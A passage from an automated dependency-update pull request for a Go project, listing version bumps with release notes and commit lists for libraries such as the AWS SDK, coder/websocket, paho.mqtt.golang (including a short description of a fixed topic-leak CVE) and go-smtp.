[github.com/uptrace/bun/driver/pgdriver](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc](https://github.com/open-telemetry/opentelemetry-go) | `1.37.0` | `1.43.0` |\n| [go.thethings.network/lorawan-stack-legacy/v2](https://github.com/TheThingsNetwork/lorawan-stack) | `2.1.0` | `2.1.1` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.0` | `1.27.1` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.35.0` | `0.36.0` |\n\n\nUpdates `github.com/KimMachineGun/automemlimit` from 0.7.4 to 0.7.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KimMachineGun/automemlimit/releases\"\u003egithub.com/KimMachineGun/automemlimit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003eKimMachineGun/automemlimit#31\u003c/a\u003e) by \u003ca href=\"https://github.com/KimMachineGun\"\u003e\u003ccode\u003e@​KimMachineGun\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003ehttps://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ehttps://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003e\u003ccode\u003e6d12049\u003c/code\u003e\u003c/a\u003e fix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003e#31\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.29.12 to 1.32.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.29.12...config/v1.32.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/s3` from 1.78.2 to 1.98.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ba7e432545fa3203d98f593b2aceaba66c02db7a\"\u003e\u003ccode\u003eba7e432\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/607cb0afad6e6a655a356be54f9fdec5cc558a80\"\u003e\u003ccode\u003e607cb0a\u003c/code\u003e\u003c/a\u003e Release 2026-03-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a44005fd4a2e2b7308c0346da970890757aaeda5\"\u003e\u003ccode\u003ea44005f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dbbd8465f03f1931d85d38af45f18362cbc4c469\"\u003e\u003ccode\u003edbbd846\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5b5c3f960e98cf024a8b7d6a6a8f0a1452e028fa\"\u003e\u003ccode\u003e5b5c3f9\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3369\"\u003e#3369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7ca3f9d52a718e4be3a78be0d05e6437ae362e20\"\u003e\u003ccode\u003e7ca3f9d\u003c/code\u003e\u003c/a\u003e drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/338088bc3ce801d773863578da6a0a835d6012af\"\u003e\u003ccode\u003e338088b\u003c/code\u003e\u003c/a\u003e Release 2026-03-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f0e5f3dc09ddb548bccfc11b297229839516bff9\"\u003e\u003ccode\u003ef0e5f3d\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.78.2...service/s3/v1.98.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/coder/websocket` from 1.8.13 to 1.8.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/coder/websocket/releases\"\u003egithub.com/coder/websocket's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.8.14\u003c/h2\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: match Origin scheme if defined in OriginPatterns by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/536\"\u003ecoder/websocket#536\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine by \u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads by \u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: update to Go 1.23 by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/524\"\u003ecoder/websocket#524\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild: add Makefile by \u003ca href=\"https://github.com/mafredri\"\u003e\u003ccode\u003e@​mafredri\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/525\"\u003ecoder/websocket#525\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update LICENSE file by \u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: apply various modernisations by \u003ca href=\"https://github.com/Jacalz\"\u003e\u003ccode\u003e@​Jacalz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/531\"\u003ecoder/websocket#531\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mtojek\"\u003e\u003ccode\u003e@​mtojek\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/526\"\u003ecoder/websocket#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ash2k\"\u003e\u003ccode\u003e@​ash2k\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/532\"\u003ecoder/websocket#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DanielleMaywood\"\u003e\u003ccode\u003e@​DanielleMaywood\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/coder/websocket/pull/535\"\u003ecoder/websocket#535\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ehttps://github.com/coder/websocket/compare/v1.8.13...v1.8.14\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/7d7c644330e727379c3e33fddc154ac208b925f3\"\u003e\u003ccode\u003e7d7c644\u003c/code\u003e\u003c/a\u003e refactor: add \u003ccode\u003eErrMessageTooBig\u003c/code\u003e sentinel error for limited reads (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/535\"\u003e#535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/c7846ea6a8849fe21aed3b8319bac906e8cb1dca\"\u003e\u003ccode\u003ec7846ea\u003c/code\u003e\u003c/a\u003e refactor: use \u003ccode\u003econtext.AfterFunc\u003c/code\u003e to track timeouts instead of goroutine (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/e11dd4e741173381256344d57b3bfc3fa38a9d25\"\u003e\u003ccode\u003ee11dd4e\u003c/code\u003e\u003c/a\u003e fix: match Origin scheme if defined in OriginPatterns (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/536\"\u003e#536\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/91013c129147ee6375b65cf150fa151d2fcc0bce\"\u003e\u003ccode\u003e91013c1\u003c/code\u003e\u003c/a\u003e chore: apply various modernisations (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/efb626be44240d7979b57427265d9b6402166b96\"\u003e\u003ccode\u003eefb626b\u003c/code\u003e\u003c/a\u003e chore: update LICENSE file (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/526\"\u003e#526\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/246891f172ef96b0b5681c8e4d59dfd32ad1b091\"\u003e\u003ccode\u003e246891f\u003c/code\u003e\u003c/a\u003e build: add Makefile (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/525\"\u003e#525\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/coder/websocket/commit/778d161bfd21f3cfa8052d8b84e8c86e08ce41c7\"\u003e\u003ccode\u003e778d161\u003c/code\u003e\u003c/a\u003e build: update to Go 1.23 (\u003ca href=\"https://redirect.github.com/coder/websocket/issues/524\"\u003e#524\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/coder/websocket/compare/v1.8.13...v1.8.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/eclipse/paho.mqtt.golang` from 1.5.0 to 1.5.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/releases\"\u003egithub.com/eclipse/paho.mqtt.golang's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.5.1\u003c/h2\u003e\n\u003cp\u003eThis is a minor release incorporating changes made in the 14 months since v1.5.0 (including updating dependencies, and raising the Go version to 1.24). The changes are relatively minor but address a potential security issue (\u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e), possible panic, enable users to better monitor the connection status, and incorporate a few optimisations.\u003c/p\u003e\n\u003cp\u003eThanks to those who have provided fixes/enhancements included in this release!\u003c/p\u003e\n\u003cp\u003eSpecial thanks to Paul Gerste at \u003ca href=\"https://www.sonarsource.com/\"\u003eSonar\u003c/a\u003e for reporting issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e via the Eclipse security team (fix was implemented in PR \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/714\"\u003e#714\u003c/a\u003e in May, github issue created just prior to this release). This issue arose where a topic \u0026gt; 65535 bytes was passed to the \u003ccode\u003ePublish\u003c/code\u003e function, due to the way the data was encoded the topic could leak into the message body. Please see issue \u003ca href=\"https://redirect.github.com/eclipse/paho.mqtt.golang/issues/730\"\u003e#730\u003c/a\u003e or \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2025-10543\"\u003eCVE-2025-10543\u003c/a\u003e for further details.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdating go dependencies from pub and sub into the containers before building by \u003ca href=\"https://github.com/JefJrFigueiredo\"\u003e\u003ccode\u003e@​JefJrFigueiredo\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/691\"\u003eeclipse-paho/paho.mqtt.golang#691\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize TCP connection logic by \u003ca href=\"https://github.com/geekeryy\"\u003e\u003ccode\u003e@​geekeryy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/713\"\u003eeclipse-paho/paho.mqtt.golang#713\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFields over 65535 bytes not encoded correctly by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/714\"\u003eeclipse-paho/paho.mqtt.golang#714\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReduce slice allocations in route dispatch  by \u003ca href=\"https://github.com/alespour\"\u003e\u003ccode\u003e@​alespour\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/710\"\u003eeclipse-paho/paho.mqtt.golang#710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd a ConnectionNotificationHandler by \u003ca href=\"https://github.com/RangelReale\"\u003e\u003ccode\u003e@​RangelReale\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/727\"\u003eeclipse-paho/paho.mqtt.golang#727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePotential panic when using manual ACK by \u003ca href=\"https://github.com/MattBrittan\"\u003e\u003ccode\u003e@​MattBrittan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/eclipse-paho/paho.mqtt.golang/pull/729\"\u003eeclipse-paho/paho.mqtt.golang#729\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ehttps://github.com/eclipse-paho/paho.mqtt.golang/compare/v1.5.0...v1.5.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/b30523793968e6b7a7b1f76338a58c4fe9755299\"\u003e\u003ccode\u003eb305237\u003c/code\u003e\u003c/a\u003e Update dependencies in docker examples\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/35ee03d8496f3256cc2bf7af15fea56e21c29c96\"\u003e\u003ccode\u003e35ee03d\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/433bd22ae6ac92daf00d575def72e425bc21e39f\"\u003e\u003ccode\u003e433bd22\u003c/code\u003e\u003c/a\u003e address data race in test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/4debe3a76a5aa8f27a2616e2d4e3fc53be0dc788\"\u003e\u003ccode\u003e4debe3a\u003c/code\u003e\u003c/a\u003e Potential panic when using manual ACK\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/601453b38642642382165ab9689b20cd025d102a\"\u003e\u003ccode\u003e601453b\u003c/code\u003e\u003c/a\u003e Resolve issues in fvt_client_test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/439e2ab4c07d55c124fe03e8bb6273b93c88b61a\"\u003e\u003ccode\u003e439e2ab\u003c/code\u003e\u003c/a\u003e Dependency update (also rise Go version to 1.24)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/d27659335abe44a2838ac4c8e807dd66ee208ed0\"\u003e\u003ccode\u003ed276593\u003c/code\u003e\u003c/a\u003e ConnectionNotificationHandler - generic callback for all types of connection ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/8a350a9cff7682fc5d8d741b6e9c5b7def7b2661\"\u003e\u003ccode\u003e8a350a9\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/5620c5ed09ab99bde96402f052e548fd95d4e0c3\"\u003e\u003ccode\u003e5620c5e\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eclipse-paho/paho.mqtt.golang/commit/45048ccc79f333b4ac41ab1723aa94d63fb5ed01\"\u003e\u003ccode\u003e45048cc\u003c/code\u003e\u003c/a\u003e notifications\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eclipse/paho.mqtt.golang/compare/v1.5.0...v1.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/emersion/go-smtp` from 0.22.0 to 0.24.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/ab24fe7cbe995d404af3b1c093195f2f43b94688\"\u003e\u003ccode\u003eab24fe7\u003c/code\u003e\u003c/a\u003e Remove superfluous validateLine() calls in sendMail()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/6944e3381b812d9b418405939b07780809df6c82\"\u003e\u003ccode\u003e6944e33\u003c/code\u003e\u003c/a\u003e Implement MT-PRIORITY (RFC 6710)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/emersion/go-smtp/commit/54dd31d837eeef5d7d699c352bd03a8b4591e5d7\"\u003e\u003ccode\u003e54dd31d\u003c/code\u003e\u003c/a\u003e Implement DELIVERBY (RFC 2852)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/emersion/go-smtp/compare/v0.22.0...v0.24.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/envoyproxy/protoc-gen-validate` from 1.2.1 to 1.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/releases\"\u003egithub.com/envoyproxy/protoc-gen-validate's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.3\u003c/h2\u003e\n\u003cp\u003eOne more release attempt to get Python published on PyPI. 😄\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Python 3.9 references to 3.10 by \u003ca href=\"https://github.com/stefanvanburen\"\u003e\u003ccode\u003e@​stefanvanburen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1370\"\u003ebufbuild/protoc-gen-validate#1370\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 